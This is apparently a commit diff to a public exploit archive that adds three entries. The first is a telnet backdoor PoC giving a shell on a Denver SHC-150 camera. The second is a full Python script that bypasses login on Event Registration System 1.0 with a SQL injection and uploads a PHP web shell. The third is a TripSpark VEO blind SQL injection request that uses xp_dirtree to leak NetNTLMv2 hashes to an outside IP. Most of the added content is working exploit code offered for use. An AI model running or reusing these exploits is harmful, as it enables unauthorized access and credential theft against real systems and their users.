DB: 2021-07-29

3 changes to exploits/shellcodes Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection Event Registration System with QR Code 1.0 - Authentication Bypass & RCE TripSpark VEO Transportation - Blind SQL Injection
2021-07-29 05:01:55 +00:00 · 2021-07-29 05:01:55 +00:00 · e7fc5a3e03
commit e7fc5a3e03
parent f648cfe793
4 changed files with 177 additions and 1 deletions
--- a/exploits/hardware/remote/50160.txt
+++ b/exploits/hardware/remote/50160.txt
@ -0,0 +1,30 @@
+# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)
+# Date: 27 July 2021
+# Exploit Author: Ivan Nikolsky (enty8080)
+# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824
+# Version: Denver SHC-150 (all firmware versions)
+# Tested on: Denver SHC-150
+
+Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too.
+
+So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet.
+
+PoC:
+
+```
+enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
+Trying 192.168.2.118...
+Connected to pc192-168-2-118.
+Escape character is '^]'.
+
+goke login: default
+$ ls /
+bin      home     linuxrc  opt      run      tmp
+dev      init     media    proc     sbin     usr
+etc      lib      mnt      root     sys      var
+$ pwd
+/home/default
+$ exit
+Connection closed by foreign host.
+enty8080@Ivans-Air ~ %
+```
--- a/exploits/php/webapps/50159.py
+++ b/exploits/php/webapps/50159.py
@ -0,0 +1,107 @@
+# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
+# Exploit Author: Javier Olmedo
+# Date: 27/07/2021
+# Vendor: Sourcecodester
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
+# Affected Version: 1.0
+# Category: WebApps
+# Platform: PHP
+# Tested on: Ubuntu Server & Windows 10 Pro
+ 
+import os, re, sys, argparse, requests
+from termcolor import cprint
+
+def banner():
+    os.system("cls")
+    print('''
+    ___________                    __   
+    \_   _____/__  __ ____   _____/  |_ 
+     |    __)_\  \/ // __ \ /    \   __\\
+     |        \\\\   /\  ___/|   |  \  |  
+    /_______  / \_/  \___  >___|  /__|  
+            \/           \/     \/ 
+             Registration System
+     --[Authentication Bypass and RCE]--
+                @jjavierolmedo
+    ''')   
+
+def get_args():
+    parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
+    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
+    parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
+    args = parser.parse_args()
+    return args         
+
+def auth_bypass(s, proxies, url):
+    data = {
+        "username":"admin'#",
+        "password":""
+    }
+
+    r = s.post(url, data=data, proxies=proxies)
+
+    if('{"status":"success"}' in r.text):
+        cprint("[+] Authenticacion Bypass Success!\n", "green")
+        return s
+    else:
+        cprint("[-] Authenticacion Bypass Error!\n", "red")
+        sys.exit(0)
+    
+def upload_shell(s, proxies, url):
+    content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
+    file = {
+        'img':('cmd.php',content)
+    }
+
+    data = {
+        "name":"Event Registration System with QR Code - PHP",
+        "short_name":"ERS-QR-PHP",
+    }
+
+    r = s.post(url, files=file, data=data, proxies=proxies)
+
+    if('1' in r.text and r.status_code == 200):
+        cprint("[+] Upload Shell Success!\n", "green")
+        return s
+    else:
+        cprint("[-] Upload Shell Error!\n", "red")
+        sys.exit(0)
+
+def get_shell_url(s, proxies, url):
+    r = s.get(url, proxies=proxies)
+    regex = '\_cmd.php"> (.*?)</a></li>'
+    shell_name = re.findall(regex, r.text)[0]
+    url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
+    cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
+
+def main():
+    banner()
+    args = get_args()
+    target = args.target
+    proxies = {'http':'','https':''}
+    if args.proxy:
+        proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
+
+    login_url = target + "/event/classes/Login.php?f=rlogin"
+    upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
+    shell_url = target + "/event/uploads/"
+
+    s = requests.Session()
+    s = auth_bypass(s, proxies, login_url)
+    s = upload_shell(s, proxies, upload_url)
+    s = get_shell_url(s, proxies, shell_url)
+     
+if __name__ == "__main__":
+    try:
+        main()
+    except KeyboardInterrupt:
+        cprint("[-] User aborted session\n", "red")
+        sys.exit(0)
+
+# Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
--- a/exploits/windows/webapps/50161.txt
+++ b/exploits/windows/webapps/50161.txt
@ -0,0 +1,36 @@
+# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection
+# Google Dork: inhtml:"Student Busing Information" 
+# Date: 07/27/2021
+# Exploit Author: Sedric Louissaint @L_Kn0w
+# Vendor Homepage: https://www.tripspark.com
+# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf 
+# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084
+# OS Tested on: Microsoft Windows Server 2012 R2 Standard
+# Vender Notified: 01/19/2021
+# Confirmed Patch was released : 06/15/2021
+
+# Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability.
+
+# PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound).
+
+```
+
+POST / HTTP/1.1
+Host: vulnerable.site.net
+User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 4700
+Origin: vulnerable.site.net
+Connection: close
+Referer: https:// vulnerable.site.net 
+Cookie: ASP.NET_SessionId=x
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit
+
+```
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18519,6 +18519,7 @@ id,file,description,date,author,type,platform,port
 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,
 50136,exploits/cgi/remote/50136.py,"Aruba Instant (IAP) - Remote Code Execution",2021-07-15,"Aleph Security",remote,cgi,
 50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware,
+50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",2021-07-28,"Ivan Nikolsky",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -44289,5 +44290,7 @@ id,file,description,date,author,type,platform,port
 50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,
 50154,exploits/windows/webapps/50154.py,"NoteBurner 2.35 - Denial Of Service (DoS) (PoC)",2021-07-26,stresser,webapps,windows,
 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",2021-07-26,faisalfs10x,webapps,php,
-50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",2021-07-27,"Faisal Alhadlaq",webapps,php,
+50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",2021-07-27,S1lv3r,webapps,php,
 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,
+50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass & RCE",2021-07-28,"Javier Olmedo",webapps,php,
+50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",2021-07-28,"Sedric Louissaint",webapps,windows,